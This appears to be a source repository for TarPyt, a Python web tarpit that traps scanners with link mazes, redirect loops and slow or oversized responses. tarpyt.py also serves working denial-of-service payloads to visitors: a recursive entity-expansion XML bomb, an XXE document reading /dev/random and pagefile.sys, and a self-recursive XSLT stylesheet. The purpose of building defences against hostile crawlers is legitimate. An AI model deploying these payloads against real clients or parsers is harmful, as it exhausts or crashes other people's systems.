├── .gitignore
├── README.md
├── genmarkov.py
├── tarpyt-fcgi.py
├── tarpyt-wsgiref.py
├── tarpyt.cfg
├── tarpyt.py
└── www
    └── robots.txt


/.gitignore:
--------------------------------------------------------------------------------
1 | *.pyc
2 | *.mkv
3 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | TarPyt
 2 | ======
 3 | TarPyt is a Python Web tarpit, inspired by a description of a PHP
 4 | equivalent called [Labyrinth](https://code.google.com/p/weblabyrinth/).
 5 | It's an automated scanner's worst nightmare, a maze of twisty URIs, all alike.
 6 | 
 7 | Running TarPyt
 8 | --------------
 9 | 
10 | TarPyt can be run on its own, or as a
11 | [WSGI](http://wsgi.readthedocs.org/en/latest/index.html) app. In its current
12 | (testing) state, running under a separate webserver as a WSGI app has not been
13 | tested, but should work just fine. To run standalone, just run:
14 | 
15 |     python tarpyt.py
16 | 
17 | Generating Markov chains
18 | ------------------------
19 | 
20 | The included `genmarkov.py` can be used to generate and
21 | [pickle](http://docs.python.org/library/pickle.html) a simple Markov chain for
22 | building html-like content. I've had decent luck pointing it at the
23 | [Alexa](http://www.alexa.com/topsites) top 20 web sites, downloaded with
24 | `wget`. Currently, TarPyt only uses these chains to generate urls, but full
25 | pages will be coming soon.
26 | 
27 | Features
28 | --------
29 | A random list of features, to be better organized later:
30 | 
31 | * WSGI-compatible interface
32 | * "Random" different responses (HTTP redirects, link pages, etc.)
33 | * Base response on a hash of the request, so it's consistent
34 | * Generate Markov chains of HTML and URI paths for realistic responses
35 | * Infinite redirects, slow responses
36 | * Artificially slow responses (1 Bps)
37 | * Artificially large (4GB) content-length headers for agents that pre-allocate storage
38 | 
39 | Todo
40 | ----
41 | * Shell script to get top 100 Alexa sites and build markov chains
42 | * Use Markov chains to build HTML in responses
43 | * False positives for scanners: SQLi (database errors), etc.
44 | * Alerting, stats?
45 | 
46 | Attacks
47 | -------
48 | Possible ideas for cruelty to scanners/spiders:
49 | 
50 | * Pathological-case compression (high resource use for recipient)
51 | * Broken markup: research edge cases for XML parsers
52 | 


--------------------------------------------------------------------------------
/genmarkov.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python
  2 | 
  3 | from HTMLParser import HTMLParser, HTMLParseError
  4 | from optparse import OptionParser
  5 | import fileinput
  6 | import pickle
  7 | import random
  8 | import sys
  9 | from codecs import open
 10 | 
 11 | class MarkovChain(object):
 12 |     def __init__(self):
 13 |         self.words = {}
 14 |         self.maxcount = 0
 15 | 
 16 |     def add(self, prev_word, next_word):
 17 |         if not (prev_word in self.words):
 18 |             self.words[prev_word] = {}
 19 |         if not (next_word in self.words[prev_word]):
 20 |             self.words[prev_word][next_word] = 0
 21 |         self.words[prev_word][next_word] += 1
 22 |         self.maxcount = max(self.maxcount, self.words[prev_word][next_word])
 23 | 
 24 |     def get(self, prev_word):
 25 |         if not (prev_word in self.words):
 26 |             return random.choice(self.words.keys())
 27 |         followers = self.words[prev_word]
 28 |         allcounts = sum(followers.itervalues())
 29 |         randval = random.randint(1,allcounts)
 30 |         partial_sum = 0
 31 |         for word, count in followers.iteritems():
 32 |             partial_sum += count
 33 |             if partial_sum >= randval:
 34 |                 return word
 35 | 
 36 | class TagState(object):
 37 |     def __init__(self, tag='^', prev='^'):
 38 |         self.prev_child = prev
 39 |         self.tag = tag
 40 | 
 41 | class MarkovBuilder(HTMLParser, object):
 42 |     def setup_chain(self):
 43 |         self.siblings = MarkovChain()
 44 |         self.children = MarkovChain()
 45 |         self.attrs = MarkovChain()
 46 |         self.data = MarkovChain()
 47 |         self.uripaths = MarkovChain()
 48 |         self.tagstack = [TagState()]
 49 |         self.maxsibs = 0
 50 |         self.maxdepth = 0
 51 |         self.gendepth = 0
 52 |         self.popped = True
 53 | 
 54 |     def handle_starttag(self, tag, attrs):
 55 |         self.popped = False
 56 |         state = self.tagstack[-1]
 57 |         #print >>sys.stderr, "{0: >10}{1}{2}".format(state.tag," "*len(self.tagstack), tag)
 58 |         if state.tag in ('meta','input','img','br','script','style','link'):
 59 |             self.handle_endtag(state.tag)
 60 |             state = self.tagstack[-1]
 61 |         if state.prev_child == '^':
 62 |             self.children.add(state.tag, tag)
 63 |         else:
 64 |             self.siblings.add(state.prev_child, tag)
 65 |         state.prev_child = tag
 66 |         prev_attr = tag
 67 |         for attr in attrs:
 68 |             if attr[0] == 'href':
 69 |                 prev_path = '^'
 70 |                 elems = attr[1].split('/')
 71 |                 if len(elems) > 1 and elems[1] == '':
 72 |                     elems = elems[3:]
 73 |                 for elem in elems:
 74 |                     self.uripaths.add(prev_path, elem)
 75 |                     prev_path = elem
 76 |                 self.uripaths.add(prev_path, '$')
 77 |             str_attr = u'{0}="{1}"'.format(*attr)
 78 |             self.attrs.add(prev_attr, str_attr)
 79 |             prev_attr = str_attr
 80 |         self.attrs.add(prev_attr, '$')
 81 |         newstate = TagState(tag=tag)
 82 |         self.tagstack.append(newstate)
 83 |         self.maxdepth = max(self.maxdepth, len(self.tagstack))
 84 | 
 85 |     def handle_endtag(self, tag):
 86 |         state = self.tagstack.pop()
 87 |         if len(self.tagstack) == 0:
 88 |             self.tagstack = [TagState()]
 89 |         if state.prev_child == '^':
 90 |             self.children.add(state.tag, '$')
 91 |         if self.popped:
 92 |             self.siblings.add(state.tag, '$')
 93 |         self.popped = True
 94 | 
 95 |     def handle_startendtag(self, tag, attrs):
 96 |         self.handle_starttag(tag, attrs)
 97 |         self.handle_endtag(tag)
 98 | 
 99 |     def handle_data(self, data):
100 |         self.data.add(self.tagstack[-1].tag, data)
101 | 
102 |     def unknown_decl(self, data):
103 |         pass
104 | 
105 |     def save(self, filename='html.mkv'):
106 |         out = open(filename, mode='wb')
107 |         pickle.dump(self, out, protocol=2)
108 | 
109 |     def generate(self, tag='html', generate_links=False, depth=0):
110 |         out = []
111 |         count = 0
112 |         while tag != '$' and count <= self.siblings.maxcount:
113 |             count += 1
114 |             contents = []
115 |             if generate_links and tag == 'a':
116 |                 path = ['^']
117 |                 while path[-1] != '$':
118 |                     path.append(self.uripaths.get(path[-1]))
119 |                 contents = [tag]+[u'href="/{0}"'.format('/'.join(path[1:-1]))]
120 |             else:
121 |                 attr = tag
122 |                 while attr != '$':
123 |                     contents.append(attr)
124 |                     attr = self.attrs.get(attr)
125 |             out.append(u'<{0}>\n'.format(' '.join(contents)))
126 |             data = self.data.get(tag)
127 |             if data and data != '$':
128 |                 out.append(data)
129 |             first_child = self.children.get(tag)
130 |             if first_child and first_child != '$':
131 |                 depth += 1
132 |                 if depth <= self.maxdepth:
133 |                     out.append(self.generate(
134 |                         first_child,
135 |                         generate_links=generate_links,
136 |                         depth=depth))
137 |             out.append(u'</{0}>\n'.format(tag))
138 |             tag = self.siblings.get(tag)
139 |         return ''.join(out)
140 | 
141 |     def reset(self):
142 |         super(MarkovBuilder, self).reset()
143 |         self.tagstack = [TagState()]
144 | 
145 | class GotCharset(Exception):
146 |     def __init__(self, charset):
147 |         assert charset
148 |         self.charset = charset
149 | 
150 | class EncodingDetector(HTMLParser):
151 |     def handle_starttag(self, tag, attrs):
152 |         if tag == 'meta':
153 |             attrhash = {}
154 |             for attr in attrs:
155 |                 attrhash[attr[0]] = attr[1]
156 |             if 'charset' in attrhash:
157 |                 raise GotCharset, attrhash['charset']
158 |             elif 'http-equiv' in attrhash:
159 |                 if attrhash['http-equiv'].lower() == 'content-type':
160 |                     for chunk in attrhash['content'].split(';'):
161 |                         if 'charset' in chunk:
162 |                             raise GotCharset, chunk.split('=')[-1]
163 | 
164 | def parse(filenames):
165 |     builder = MarkovBuilder()
166 |     builder.setup_chain()
167 |     for fname in filenames:
168 |         filein = open(fname, mode='rb', encoding='utf-8', errors='replace')
169 |         try:
170 |             try:
171 |                 getcharset = EncodingDetector()
172 |                 for line in filein:
173 |                     getcharset.feed(line)
174 |             except GotCharset as e:
175 |                 filein.close()
176 |                 filein = open(fname, mode='rb', encoding=e.charset, errors='replace')
177 |             filein.seek(0)
178 |             builder.feed(filein.read())
179 |             builder.close()
180 |         except HTMLParseError:
181 |             pass
182 |         builder.reset()
183 |         filein.close()
184 |     return builder
185 | 
186 | 
187 | if __name__=='__main__':
188 |     parser = OptionParser()
189 |     parser.add_option('-p', '--pickle',
190 |             help='Pickle the MarkovBuilder into FILE', metavar='FILE')
191 |     (options, args) = parser.parse_args()
192 |     builder = parse(args)
193 |     if options.pickle:
194 |         builder.save(options.pickle)
195 |     print builder.generate()
196 | 


--------------------------------------------------------------------------------
/tarpyt-fcgi.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | from flup.server.fcgi import WSGIServer
 4 | from optparse import OptionParser
 5 | from tarpyt import Tarpyt
 6 | 
 7 | if __name__=='__main__':
 8 |     parser = OptionParser()
 9 |     parser.add_option('-f', '--config',
10 |             help='Tarpyt config file', metavar='FILE')
11 |     (options, args) = parser.parse_args()
12 |     tarpyt = Tarpyt(options.config)
13 |     WSGIServer(tarpyt.application).run()
14 | 


--------------------------------------------------------------------------------
/tarpyt-wsgiref.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | from wsgiref.simple_server import make_server
 4 | from optparse import OptionParser
 5 | from tarpyt import Tarpyt
 6 | 
 7 | if __name__=='__main__':
 8 |     parser = OptionParser()
 9 |     parser.add_option('-f', '--config',
10 |             help='Tarpyt config file', metavar='FILE')
11 |     (options, args) = parser.parse_args()
12 |     tarpyt = Tarpyt(options.config)
13 |     httpd = make_server('', 8080, tarpyt.application)
14 |     httpd.serve_forever()
15 | 


--------------------------------------------------------------------------------
/tarpyt.cfg:
--------------------------------------------------------------------------------
 1 | #Config file for TarPyt
 2 | [tarpyt]
 3 | # A pickled instance of a genmarkov.MarkovBuilder object
 4 | #markov_file= html.mkv
 5 | # A directory out of which to serve files. Overrides [responses] below
 6 | www_dir= ./www
 7 | 
 8 | # Responses to use, chosen proportional to their weight
 9 | [responses]
10 | # A page full of links
11 | linkpage= 7
12 | # A redirect to some other page
13 | redirect= 1
14 | # A chain of redirects that loops back on itself
15 | inf_redirect= 1
16 | # An empty response with an oversize Content-Length header
17 | oversize= 1
18 | # A response returned one byte per second
19 | slow= 1
20 | # XSL template recursion
21 | xslt_recurse= 1
22 | # external entity references large/infinite local system files
23 | xxe_dos= 1
24 | # Memory exhaustion through recursive entity definitions
25 | entity_dos= 1
26 | 


--------------------------------------------------------------------------------
/tarpyt.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python
  2 | 
  3 | import random
  4 | from zlib import adler32
  5 | from ConfigParser import SafeConfigParser, NoOptionError
  6 | from bisect import bisect_right
  7 | import pickle
  8 | import time
  9 | import urllib
 10 | import os
 11 | #import sys #stderr
 12 | 
 13 | from genmarkov import MarkovBuilder, TagState, MarkovChain
 14 | 
 15 | class Tarpyt(object):
 16 |     def __init__(self, config=None):
 17 |         self.builder = None
 18 |         self.www_dir = None
 19 |         conf = SafeConfigParser()
 20 |         if config:
 21 |             if hasattr(config, 'readline'):
 22 |                 conf.readfp(config)
 23 |             else:
 24 |                 conf.read(config)
 25 |         if conf.has_section('tarpyt'):
 26 |             try:
 27 |                 mkvfile = conf.get('tarpyt','markov_file')
 28 |                 mfile = open(mkvfile, 'rb')
 29 |                 self.set_builder(pickle.load(mfile))
 30 |             except NoOptionError:
 31 |                 self.builder = None
 32 |             try:
 33 |                 www = conf.get('tarpyt', 'www_dir')
 34 |                 self.www_dir = os.path.abspath(www) if os.path.isdir(www) else None
 35 |             except NoOptionError:
 36 |                 self.www_dir = None
 37 |         self.weight_total = 0
 38 |         self.responses = []
 39 |         if conf.has_section('responses'):
 40 |             def update(response):
 41 |                 self.responses.append(
 42 |                         getattr(self, 'response_' + response[0]) )
 43 |                 self.weight_total += int(response[1])
 44 |                 return self.weight_total
 45 |             self.weights = map(update,
 46 |                 sorted( conf.items('responses'), key=lambda x: int(x[1]) ))
 47 |         else:
 48 |             self.responses.append(self.response_linkpage)
 49 |             self.weights = [1]
 50 |             self.weight_total = 1
 51 | 
 52 |     def getresponse(self, key):
 53 |         index = adler32(key) % self.weight_total
 54 |         i = bisect_right(self.weights, index)
 55 |         r = self.responses[i]
 56 |         return self.responses[bisect_right(self.weights, index)]
 57 | 
 58 |     def getlink(self, path='/'):
 59 |         next_path = path.rstrip('/') + '/{0}'
 60 |         return next_path.format(chr(random.randint(0x61,0x7A)))
 61 | 
 62 |     def set_builder(self, builder):
 63 |         self.builder = builder
 64 |         def getlink(path='/'):
 65 |             pathlist = ['^']
 66 |             pathlist.extend(filter(lambda x: x, path.split('/')))
 67 |             elem = self.builder.uripaths.get(pathlist[-1])
 68 |             if elem == '$':
 69 |                 elem = self.builder.uripaths.get(None)
 70 |             return '/'+'/'.join(pathlist[1:]+[elem])
 71 |         self.getlink = getlink
 72 | 
 73 |     def response_slow(self, environ, start_response):
 74 |         """ Category: tarpit
 75 |         Returns an html page, but very slowly
 76 |         """
 77 |         content = None
 78 |         if self.builder:
 79 |             content = self.builder.generate(generate_links=True)
 80 |         else:
 81 |             content = u"A" * 4096
 82 |         status = '200 OK'
 83 |         headers = [('Content-Length',str(len(content)))]
 84 |         start_response(status, headers)
 85 |         for char in content.encode('utf-8'):
 86 |             yield char
 87 |             time.sleep(1)
 88 | 
 89 |     def response_linkpage(self, environ, start_response):
 90 |         """ Category: tarpit
 91 |         Returns an html page full of links
 92 |         """
 93 |         response_body = None
 94 |         if self.builder:
 95 |             response_body = self.builder.generate(generate_links=True)
 96 |         else:
 97 |             page_string = "<html><head><title>Welcome to the Labyrinth</title></head><body><ul>{0}</ul></body></html>"
 98 |             link_string = '<li><a href="{0}">{0}</a></li>'
 99 |             links = []
100 |             prev_href = ''
101 |             for n in range(0,5):
102 |                 href = self.getlink(os.path.normpath(environ['SCRIPT_NAME']+'/'+environ['PATH_INFO']))
103 |                 links.append(link_string.format(href))
104 |             response_body = page_string.format(''.join(links))
105 |         status = '200 OK'
106 |         start_response(status, [])
107 |         if isinstance(response_body, unicode):
108 |             response_body = response_body.encode('utf-8')
109 |         return [response_body]
110 | 
111 |     def response_redirect(self, environ, start_response):
112 |         """ Category: realism
113 |         Redirects to a random page
114 |         """
115 |         status = '302 Found'
116 |         location = self.getlink(environ['SCRIPT_NAME'])
117 |         if isinstance(location, unicode):
118 |             location = urllib.quote(location.encode('utf-8'))
119 |         headers = [('Location', location)]
120 |         start_response(status, headers)
121 |         return ""
122 | 
123 |     def response_inf_redirect(self, environ, start_response):
124 |         """ Category: tarpit
125 |         Returns a 302 redirect to a page which has the same modulus as the
126 |         one requested, resulting in an infinite redirect. Loops eventually.
127 |         If a suitable redirect cannot be made, falls back to appending a
128 |         random path element to the path requested.
129 |         """
130 |         newpath = environ['PATH_INFO']
131 |         modulus = self.weight_total
132 |         tmp = 0
133 |         chord = 0
134 |         pos = len(newpath) - 1
135 |         while pos > 0:
136 |             chord = ord(newpath[pos])
137 |             tmp = chord + modulus
138 |             while tmp != chord:
139 |                 if tmp > ord('z'):
140 |                     tmp %= modulus
141 |                 if (tmp >= 0x30 and tmp <= 0x39) \
142 |                         or (tmp >= 0x41 and tmp <= 0x5A) \
143 |                         or (tmp >= 0x61 and tmp <= 0x7A):
144 |                             break
145 |                 tmp += modulus
146 |             if tmp == chord:
147 |                 pos -= 1
148 |             else:
149 |                 break
150 |         if pos != 0:
151 |             newpath = newpath[:pos] + chr(tmp) + newpath[pos+1:]
152 |         else:
153 |             newpath = self.getlink(newpath)
154 |         status = '302 Found'
155 |         if isinstance(newpath, unicode):
156 |             newpath = urllib.quote(newpath.encode('utf-8'))
157 |         headers = [('Location', os.path.normpath(environ['SCRIPT_NAME']+'/'+newpath))]
158 |         start_response(status, headers)
159 |         return ""
160 | 
161 |     def response_oversize(self, environ, start_response):
162 |         """ Category: attack
163 |         Sends an oversized Content-Length header. Some web servers have had
164 |         Denial of Service vulnerabilities due to preallocating memory or disk
165 |         (e.g. https://secunia.com/advisories/35645). Some spiders may have
166 |         similar vulns (See, e.g., feature request for wget: 
167 |         https://lists.gnu.org/archive/html/bug-wget/2012-01/msg00054.html)
168 |         """
169 |         status = '200 OK'
170 |         headers = [('Content-Length', str(4 * 2**30))]
171 |         start_response(status, headers)
172 |         return ["",""] #Prevent WSGI from calculating content-length
173 | 
174 |     def response_entity_dos(self, environ, start_response):
175 |         """ Category: attack
176 |         Sends a malicious XML document that triggers a denial of service through
177 |         entity expansions.
178 |         
179 |         Reference: CWE-776 (http://cwe.mitre.org/data/definitions/776.html)
180 |         """
181 |         status = '200 OK'
182 |         headers = [('Content-type', 'application/xml')]
183 |         start_response(status, headers)
184 |         return """<?xml version="1.0"?>
185 |         <!DOCTYPE spaml [
186 |         <!ENTITY a "spam">
187 |         <!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;">
188 |         <!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;">
189 |         <!ENTITY d "&c;&c;&c;&c;&c;&c;&c;&c;&c;&c;">
190 |         <!ENTITY e "&d;&d;&d;&d;&d;&d;&d;&d;&d;&d;">
191 |         <!ENTITY f "&e;&e;&e;&e;&e;&e;&e;&e;&e;&e;">
192 |         <!ENTITY g "&f;&f;&f;&f;&f;&f;&f;&f;&f;&f;">
193 |         <!ENTITY h "&g;&g;&g;&g;&g;&g;&g;&g;&g;&g;">
194 |         <!ENTITY i "&h;&h;&h;&h;&h;&h;&h;&h;&h;&h;">
195 |         <!ENTITY j "&i;&i;&i;&i;&i;&i;&i;&i;&i;&i;">
196 |         <!ENTITY spam "&j;&j;&j;&j;&j;&j;&j;&j;&j;&j;">
197 |         ]>
198 |         <spaml>&spam;<spaml>
199 |         """
200 | 
201 |     def response_xxe_dos(self, environ, start_response):
202 |         """ Category: attack
203 |         Sends a malicious XML document that triggers a denial of service through
204 |         Xml eXternal Entity references. Works best against *nix by reading from
205 |         devices that never close. On Windows, currently tries to read
206 |         pagefile.sys and access a probably-nonexistent server via UNC path. See
207 |         http://archive.cert.uni-stuttgart.de/bugtraq/2002/10/msg00421.html
208 |         """
209 |         status = '200 OK'
210 |         headers = [('Content-type', 'application/xml')]
211 |         start_response(status, headers)
212 |         return """<?xml version="1.0"?>
213 |         <!DOCTYPE xxe [
214 |         <!ENTITY r SYSTEM "file:///dev/random">
215 |         <!ENTITY p SYSTEM "file://C:/pagefile.sys">
216 |         <!ENTITY u SYSTEM "file:////foo/C$/pagefile.sys">
217 |         ]>
218 |         <xxe>&r;&p;&u;</xxe>
219 |         """
220 | 
221 |     def response_xslt_recurse(self, environ, start_response):
222 |         """ Category: attack
223 |         Sends an XSL stylesheet containing an infinite recursion. The
224 |         stylesheet, itself XML, references itself as its own stylesheet to begin
225 |         the transform process, and the root template calls itself.
226 |         """
227 |         status = '200 OK'
228 |         headers = [('Content-type', 'application/xml')]
229 |         start_response(status, headers)
230 |         return """<?xml version="1.0"?>
231 |         <?xml-stylesheet type="text/xsl" href="{0}"?>
232 |         <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
233 |             <xsl:template match="/">
234 |                 <blink>SPAM</blink>
235 |                 <xsl:apply-templates select="/" />
236 |             </xsl:template>
237 |         </xsl:stylesheet>
238 |         """.format(os.path.normpath(environ['SCRIPT_NAME']+'/'+environ['PATH_INFO']))
239 | 
240 |     def application(self, environ, start_response):
241 |         verb = environ['REQUEST_METHOD']
242 |         path = os.path.normpath('/'+environ['PATH_INFO'])
243 |         if self.www_dir:
244 |             filepath = os.path.normpath( os.path.sep.join((self.www_dir, path)) )
245 |             if filepath.startswith(self.www_dir):
246 |                 try:
247 |                     serve = open(filepath, 'rb')
248 |                     body = [serve.read()]
249 |                     start_response('200 OK', [])
250 |                     return body
251 |                 except Exception as e:
252 |                     pass
253 |         return self.getresponse(verb + path)(environ, start_response)
254 | 
255 | 


--------------------------------------------------------------------------------
/www/robots.txt:
--------------------------------------------------------------------------------
1 | User-Agent: *
2 | Disallow: /
3 | 


--------------------------------------------------------------------------------